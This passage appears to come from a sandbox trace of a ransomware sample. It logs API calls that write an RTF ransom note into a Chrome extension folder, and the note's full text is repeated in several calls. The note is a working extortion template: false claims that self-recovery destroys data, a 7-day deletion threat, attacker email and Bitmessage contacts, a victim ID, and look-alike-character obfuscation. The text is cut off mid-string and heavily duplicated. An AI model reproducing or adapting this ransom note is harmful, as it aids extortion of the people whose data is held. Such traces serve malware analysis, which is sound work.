r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.310] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.311] CloseHandle (hObject=0x2e8) returned 1 [0289.311] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0289.311] GetLastError () returned 0x2 [0289.311] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n 